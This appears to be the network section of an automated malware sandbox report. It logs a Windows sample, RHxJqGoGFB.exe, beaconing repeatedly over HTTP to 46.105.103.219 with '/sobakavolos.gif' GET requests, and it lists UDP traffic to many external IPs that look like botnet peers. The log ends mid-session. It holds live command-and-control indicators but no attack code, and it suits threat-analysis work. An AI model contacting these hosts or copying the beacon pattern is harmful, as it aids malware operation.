                                                                                                          Nov 26, 2024 11:42:53.245006084 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.365087032 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:53.365225077 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.365581036 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:53.485697985 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:55.542956114 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:55.543032885 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:55.543245077 CET4975080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:55.663814068 CET804975046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:58.213360071 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.333405018 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:42:58.333492041 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.333689928 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:42:58.453633070 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:00.519923925 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:00.519992113 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:00.520348072 CET4975280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:00.644011974 CET804975246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:03.013792038 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.133718014 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:03.133788109 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.133934975 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:03.254365921 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:05.291141033 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:05.291199923 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:05.291646004 CET4975980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:05.412264109 CET804975946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:07.793997049 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:07.914283991 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:07.914402008 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:07.914680004 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:08.035574913 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:10.085289001 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:10.085350990 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:10.087786913 CET4977480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:10.207858086 CET804977446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:12.697732925 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.819538116 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:12.819608927 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.820173979 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:12.940701962 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:14.963692904 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:14.964564085 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:14.965327978 CET4978680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:15.086225033 CET804978646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:17.449290991 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.571480036 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:17.571558952 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.573354006 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:17.693694115 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:19.753793955 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:19.753858089 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:19.849225998 CET4979780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:19.969750881 CET804979746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:22.641454935 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.761518955 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:22.761595964 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.767539978 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:22.888156891 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:24.934201002 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:24.934463978 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:24.999655008 CET4980880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:25.119735003 CET804980846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:28.030862093 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.153805971 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:28.153912067 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.155122995 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:28.279392004 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:30.379323959 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:30.379426003 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:30.380247116 CET4981980192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:30.502048969 CET804981946.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:32.925575972 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:33.045810938 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:33.046086073 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:33.046200037 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:33.166158915 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:35.273452997 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:35.273607969 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:35.421061993 CET4983480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:35.541119099 CET804983446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:38.102844954 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.223965883 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:38.227237940 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.227262020 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:38.349459887 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:40.462949991 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:40.463057041 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:40.620573997 CET4984680192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:40.740792990 CET804984646.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:43.398418903 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.518455982 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:43.519156933 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.519269943 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:43.639293909 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:45.714955091 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:45.715240955 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:45.772375107 CET4985780192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:45.895739079 CET804985746.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:48.377290010 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.499614954 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:48.499712944 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.518910885 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:48.640903950 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:50.655318975 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:50.655395985 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:50.655441999 CET4986880192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:50.775371075 CET804986846.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:53.153322935 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.273375988 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:53.274676085 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.275218010 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:53.395091057 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:55.458998919 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:55.459152937 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:55.459336996 CET4988080192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:55.580089092 CET804988046.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:57.963989973 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.084708929 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:43:58.084789038 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.102690935 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:43:58.226243019 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:00.276232958 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:00.276318073 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:00.277666092 CET4989180192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:00.400209904 CET804989146.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:03.046514988 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.167021036 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:03.167128086 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.167335987 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:03.290211916 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:05.354387999 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:05.354825020 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:05.383636951 CET4990280192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:05.504755020 CET804990246.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:08.748402119 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.870527983 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:08.870601892 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.871280909 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:08.992397070 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:11.156250000 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:11.156347990 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:11.157887936 CET4991480192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:11.279685020 CET804991446.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:13.683331966 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:13.803656101 CET804992546.105.103.219192.168.2.4
                                                                                                          Nov 26, 2024 11:44:13.803805113 CET4992580192.168.2.446.105.103.219
                                                                                                          Nov 26, 2024 11:44:13.804148912 CET4992580192.168.2.446.105.103.219
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 11:42:03.490159035 CET | 53231 | 1473 | 192.168.2.4 | 94.76.206.19
Nov 26, 2024 11:42:04.009288073 CET | 53232 | 7046 | 192.168.2.4 | 89.122.185.62
Nov 26, 2024 11:42:04.537038088 CET | 53233 | 5164 | 192.168.2.4 | 188.241.130.50
Nov 26, 2024 11:42:05.552653074 CET | 53234 | 7620 | 192.168.2.4 | 186.211.10.235
Nov 26, 2024 11:42:05.869291067 CET | 53235 | 7368 | 192.168.2.4 | 179.184.169.171
Nov 26, 2024 11:42:06.405683041 CET | 53236 | 4138 | 192.168.2.4 | 84.108.73.183
Nov 26, 2024 11:42:06.938277006 CET | 53237 | 5812 | 192.168.2.4 | 188.240.66.34
Nov 26, 2024 11:42:07.456372976 CET | 49293 | 4980 | 192.168.2.4 | 190.73.34.36
Nov 26, 2024 11:42:18.744560957 CET | 57323 | 4310 | 192.168.2.4 | 93.114.144.199
Nov 26, 2024 11:42:19.376208067 CET | 57324 | 6900 | 192.168.2.4 | 122.168.100.182
Nov 26, 2024 11:42:19.901957989 CET | 57874 | 4700 | 192.168.2.4 | 98.126.7.202
Nov 26, 2024 11:42:20.685527086 CET | 57875 | 4800 | 192.168.2.4 | 202.56.221.5
Nov 26, 2024 11:42:21.197283030 CET | 57876 | 7451 | 192.168.2.4 | 188.241.239.210
Nov 26, 2024 11:42:21.746364117 CET | 57877 | 6870 | 192.168.2.4 | 187.6.136.20
Nov 26, 2024 11:42:22.262135983 CET | 52164 | 7866 | 192.168.2.4 | 113.161.12.199
Nov 26, 2024 11:42:22.783629894 CET | 52165 | 5060 | 192.168.2.4 | 203.146.109.163
Nov 26, 2024 11:42:33.776923895 CET | 61244 | 5350 | 192.168.2.4 | 92.87.229.20
Nov 26, 2024 11:42:34.578622103 CET | 61245 | 7036 | 192.168.2.4 | 59.161.19.29
Nov 26, 2024 11:42:35.103683949 CET | 61246 | 4717 | 192.168.2.4 | 190.207.236.217
Nov 26, 2024 11:42:35.885510921 CET | 61247 | 6511 | 192.168.2.4 | 188.214.36.212
Nov 26, 2024 11:42:36.404650927 CET | 61248 | 5140 | 192.168.2.4 | 180.151.8.178
Nov 26, 2024 11:42:36.933377981 CET | 49190 | 8542 | 192.168.2.4 | 177.11.161.29
Nov 26, 2024 11:42:37.454322100 CET | 49191 | 6822 | 192.168.2.4 | 202.43.114.170
Nov 26, 2024 11:42:37.966048956 CET | 49192 | 7866 | 192.168.2.4 | 191.37.199.39
Nov 26, 2024 11:42:48.856014967 CET | 59644 | 6787 | 192.168.2.4 | 181.44.61.173
Nov 26, 2024 11:42:49.634411097 CET | 59645 | 6856 | 192.168.2.4 | 118.102.149.168
Nov 26, 2024 11:42:50.177531004 CET | 59646 | 4664 | 192.168.2.4 | 86.100.45.216
Nov 26, 2024 11:42:50.962583065 CET | 55661 | 5616 | 192.168.2.4 | 39.1.15.172
Nov 26, 2024 11:42:51.482630014 CET | 55662 | 8030 | 192.168.2.4 | 220.130.154.247
Nov 26, 2024 11:42:52.057308912 CET | 55663 | 6910 | 192.168.2.4 | 113.11.62.14
Nov 26, 2024 11:42:52.560622931 CET | 55664 | 6373 | 192.168.2.4 | 203.147.91.179
Nov 26, 2024 11:42:53.089492083 CET | 55665 | 6912 | 192.168.2.4 | 115.78.135.71
Nov 26, 2024 11:43:03.885157108 CET | 63268 | 4664 | 192.168.2.4 | 31.211.133.88
Nov 26, 2024 11:43:04.681849003 CET | 63269 | 7456 | 192.168.2.4 | 89.37.188.218
Nov 26, 2024 11:43:05.197613001 CET | 63270 | 6142 | 192.168.2.4 | 41.38.34.12
Nov 26, 2024 11:43:05.995588064 CET | 63017 | 7933 | 192.168.2.4 | 177.22.43.78
Nov 26, 2024 11:43:06.511341095 CET | 63018 | 5372 | 192.168.2.4 | 86.106.240.47
Nov 26, 2024 11:43:07.291757107 CET | 63019 | 6172 | 192.168.2.4 | 150.165.220.74
Nov 26, 2024 11:43:07.807024002 CET | 63020 | 6364 | 192.168.2.4 | 86.104.74.51
Nov 26, 2024 11:43:08.321988106 CET | 63021 | 6286 | 192.168.2.4 | 27.106.75.127
Nov 26, 2024 11:43:19.074901104 CET | 56864 | 6235 | 192.168.2.4 | 118.69.54.5
Nov 26, 2024 11:43:19.876866102 CET | 56865 | 9674 | 192.168.2.4 | 190.206.225.183
Nov 26, 2024 11:43:20.369282961 CET | 55477 | 9675 | 192.168.2.4 | 90.179.53.86
Nov 26, 2024 11:43:21.155097961 CET | 55478 | 7700 | 192.168.2.4 | 113.162.238.152
Nov 26, 2024 11:43:21.665997028 CET | 55479 | 7143 | 192.168.2.4 | 79.126.164.67
Nov 26, 2024 11:43:22.640465021 CET | 55480 | 4343 | 192.168.2.4 | 202.134.163.88
Nov 26, 2024 11:43:23.141774893 CET | 55481 | 5812 | 192.168.2.4 | 27.48.201.2
Nov 26, 2024 11:43:23.656116962 CET | 55482 | 6621 | 192.168.2.4 | 187.40.170.3
Nov 26, 2024 11:43:34.104309082 CET | 57575 | 4993 | 192.168.2.4 | 202.40.190.14
Nov 26, 2024 11:43:35.156292915 CET | 57576 | 7940 | 192.168.2.4 | 191.43.4.101
Nov 26, 2024 11:43:35.481232882 CET | 57577 | 6976 | 192.168.2.4 | 5.204.242.202
Nov 26, 2024 11:43:36.272540092 CET | 52244 | 5415 | 192.168.2.4 | 41.77.183.102
Nov 26, 2024 11:43:36.792428017 CET | 52245 | 5777 | 192.168.2.4 | 175.102.10.34
Nov 26, 2024 11:43:38.098237991 CET | 52246 | 6130 | 192.168.2.4 | 123.27.55.144
Nov 26, 2024 11:43:38.512839079 CET | 52247 | 7948 | 192.168.2.4 | 94.156.127.59
Nov 26, 2024 11:43:39.102977991 CET | 52248 | 5078 | 192.168.2.4 | 200.205.47.222
Nov 26, 2024 11:43:49.213700056 CET | 53804 | 5092 | 192.168.2.4 | 114.41.80.242
Nov 26, 2024 11:43:50.261027098 CET | 53805 | 6755 | 192.168.2.4 | 92.87.163.40
Nov 26, 2024 11:43:50.786691904 CET | 53806 | 6018 | 192.168.2.4 | 189.45.44.210
Nov 26, 2024 11:43:51.312537909 CET | 50247 | 5188 | 192.168.2.4 | 23.92.221.54
Nov 26, 2024 11:43:51.838980913 CET | 50248 | 6755 | 192.168.2.4 | 59.93.199.71
Nov 26, 2024 11:43:53.182832956 CET | 50249 | 5335 | 192.168.2.4 | 119.189.3.27
Nov 26, 2024 11:43:53.701483965 CET | 50250 | 7119 | 192.168.2.4 | 122.168.100.184
Nov 26, 2024 11:43:54.213255882 CET | 50251 | 5415 | 192.168.2.4 | 180.218.251.35
Nov 26, 2024 11:44:04.291388035 CET | 51946 | 4980 | 192.168.2.4 | 115.254.32.245
Nov 26, 2024 11:44:05.543283939 CET | 51947 | 6373 | 192.168.2.4 | 37.142.67.58
Nov 26, 2024 11:44:06.359714031 CET | 51948 | 4879 | 192.168.2.4 | 113.161.196.135
Nov 26, 2024 11:44:06.687232971 CET | 59344 | 6500 | 192.168.2.4 | 123.30.169.88
Nov 26, 2024 11:44:07.197899103 CET | 59345 | 5890 | 192.168.2.4 | 61.135.18.66
Nov 26, 2024 11:44:08.317661047 CET | 59346 | 7411 | 192.168.2.4 | 190.37.87.100
Nov 26, 2024 11:44:08.843302965 CET | 59347 | 7119 | 192.168.2.4 | 123.27.31.5
Nov 26, 2024 11:44:09.355492115 CET | 59348 | 6195 | 192.168.2.4 | 190.204.201.41
Nov 26, 2024 11:44:19.469168901 CET | 49690 | 7119 | 192.168.2.4 | 183.83.206.61
Nov 26, 2024 11:44:20.538415909 CET | 49691 | 4245 | 192.168.2.4 | 41.186.11.53
Nov 26, 2024 11:44:21.596540928 CET | 49332 | 8180 | 192.168.2.4 | 189.13.99.195
Nov 26, 2024 11:44:22.109692097 CET | 49333 | 5415 | 192.168.2.4 | 122.100.99.156
Nov 26, 2024 11:44:22.643441916 CET | 49334 | 4756 | 192.168.2.4 | 117.196.243.174
Nov 26, 2024 11:44:23.433443069 CET | 49335 | 8198 | 192.168.2.4 | 118.69.52.216
Nov 26, 2024 11:44:23.948385000 CET | 49336 | 6989 | 192.168.2.4 | 59.9.134.51
Nov 26, 2024 11:44:24.468622923 CET | 49337 | 6511 | 192.168.2.4 | 200.8.30.163
Nov 26, 2024 11:44:34.557241917 CET | 52919 | 6910 | 192.168.2.4 | 178.211.97.155
Nov 26, 2024 11:44:35.620176077 CET | 52920 | 7620 | 192.168.2.4 | 189.13.136.81
Nov 26, 2024 11:44:36.685698032 CET | 55662 | 6755 | 192.168.2.4 | 210.66.249.227
Nov 26, 2024 11:44:37.206475973 CET | 55663 | 6142 | 192.168.2.4 | 86.106.240.116
Nov 26, 2024 11:44:37.733277082 CET | 55664 | 7990 | 192.168.2.4 | 189.25.10.24
Nov 26, 2024 11:44:38.514025927 CET | 55665 | 7866 | 192.168.2.4 | 78.187.175.231
Nov 26, 2024 11:44:39.033978939 CET | 55666 | 6822 | 192.168.2.4 | 110.78.163.76
Nov 26, 2024 11:44:39.543054104 CET | 55667 | 5380 | 192.168.2.4 | 190.36.155.238
Nov 26, 2024 11:44:49.627845049 CET | 65235 | 6455 | 192.168.2.4 | 190.147.184.75
Nov 26, 2024 11:44:50.637667894 CET | 55503 | 8455 | 192.168.2.4 | 118.69.244.25
Nov 26, 2024 11:44:51.876120090 CET | 55504 | 44848 | 192.168.2.4 | 59.127.110.115
Nov 26, 2024 11:44:52.238930941 CET | 55505 | 4588 | 192.168.2.4 | 179.212.232.131
Nov 26, 2024 11:44:52.983604908 CET | 55506 | 8281 | 192.168.2.4 | 112.78.3.138
Nov 26, 2024 11:44:53.730524063 CET | 55507 | 5549 | 192.168.2.4 | 130.204.120.42
Nov 26, 2024 11:44:54.292901993 CET | 55508 | 7768 | 192.168.2.4 | 113.160.133.171
Nov 26, 2024 11:44:54.793097019 CET | 55509 | 4245 | 192.168.2.4 | 202.59.129.35
Nov 26, 2024 11:45:05.299108982 CET | 51019 | 5584 | 192.168.2.4 | 203.177.71.171
Nov 26, 2024 11:45:05.721079111 CET | 57864 | 4440 | 192.168.2.4 | 93.157.193.78
Nov 26, 2024 11:45:07.228790045 CET | 57865 | 6130 | 192.168.2.4 | 92.87.229.53
Nov 26, 2024 11:45:07.967220068 CET | 57866 | 6636 | 192.168.2.4 | 177.70.129.10
Nov 26, 2024 11:45:08.308675051 CET | 57867 | 5480 | 192.168.2.4 | 190.206.122.109
Nov 26, 2024 11:45:08.841574907 CET | 57868 | 5415 | 192.168.2.4 | 186.94.161.129
Nov 26, 2024 11:45:09.373784065 CET | 57869 | 6373 | 192.168.2.4 | 41.103.106.172
Nov 26, 2024 11:45:09.895978928 CET | 57870 | 4717 | 192.168.2.4 | 190.147.4.186
Nov 26, 2024 11:45:20.415429115 CET | 59466 | 6538 | 192.168.2.4 | 113.171.248.2
Nov 26, 2024 11:45:20.935151100 CET | 59467 | 5540 | 192.168.2.4 | 91.244.214.41
Nov 26, 2024 11:45:22.525954008 CET | 56604 | 5380 | 192.168.2.4 | 201.211.227.242
Nov 26, 2024 11:45:23.188926935 CET | 56605 | 6554 | 192.168.2.4 | 177.9.220.111
Nov 26, 2024 11:45:23.596563101 CET | 56606 | 7150 | 192.168.2.4 | 186.89.27.138
Nov 26, 2024 11:45:24.143529892 CET | 56607 | 8032 | 192.168.2.4 | 177.125.164.144
Nov 26, 2024 11:45:24.636811018 CET | 56608 | 4588 | 192.168.2.4 | 109.160.120.6
Nov 26, 2024 11:45:25.160415888 CET | 56609 | 6304 | 192.168.2.4 | 186.233.253.245
Nov 26, 2024 11:45:35.678066969 CET | 49333 | 4324 | 192.168.2.4 | 178.54.140.104
Nov 26, 2024 11:45:36.075016022 CET | 49334 | 7866 | 192.168.2.4 | 202.164.40.66
Nov 26, 2024 11:45:37.757313013 CET | 64646 | 5415 | 192.168.2.4 | 201.81.99.192
Nov 26, 2024 11:45:38.415612936 CET | 64647 | 5089 | 192.168.2.4 | 27.251.25.201
Nov 26, 2024 11:45:38.810537100 CET | 64648 | 5415 | 192.168.2.4 | 190.37.212.191
Nov 26, 2024 11:45:39.324346066 CET | 64649 | 6953 | 192.168.2.4 | 86.124.69.204
Nov 26, 2024 11:45:39.845958948 CET | 64650 | 49928 | 192.168.2.4 | 92.255.170.197
Nov 26, 2024 11:45:40.375190020 CET | 64651 | 5460 | 192.168.2.4 | 203.98.101.59
Nov 26, 2024 11:45:50.729861021 CET | 65023 | 10510 | 192.168.2.4 | 121.42.25.3
Nov 26, 2024 11:45:51.385540009 CET | 65024 | 5350 | 192.168.2.4 | 182.73.61.11
Nov 26, 2024 11:45:52.914546967 CET | 62741 | 6219 | 192.168.2.4 | 190.204.170.165
Nov 26, 2024 11:45:53.440800905 CET | 62742 | 9675 | 192.168.2.4 | 69.195.140.124
Nov 26, 2024 11:45:54.007905006 CET | 62743 | 5225 | 192.168.2.4 | 85.65.46.116
Nov 26, 2024 11:45:54.645344973 CET | 62744 | 4392 | 192.168.2.4 | 184.44.28.10
Nov 26, 2024 11:45:55.123272896 CET | 62745 | 4539 | 192.168.2.4 | 110.164.71.147
Nov 26, 2024 11:45:55.637487888 CET | 62746 | 5820 | 192.168.2.4 | 211.22.167.175
Nov 26, 2024 11:46:05.928533077 CET | 63571 | 6228 | 192.168.2.4 | 218.208.102.21
Nov 26, 2024 11:46:06.727567911 CET | 55286 | 5380 | 192.168.2.4 | 36.224.135.49
                                                                                                          • 46.105.103.219
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.44973246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:09.709120989 CET161OUTGET /sobakavolos.gif?6e1ab4=64942164 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.44973546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:14.559591055 CET163OUTGET /sobakavolos.gif?102407c=118473572 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.44973746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:19.505198002 CET162OUTGET /sobakavolos.gif?1a7967a=83280750 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.44974246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:24.336519003 CET162OUTGET /sobakavolos.gif?247d6b5=76524906 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.44974546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:29.163791895 CET163OUTGET /sobakavolos.gif?2e864a2=146353638 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
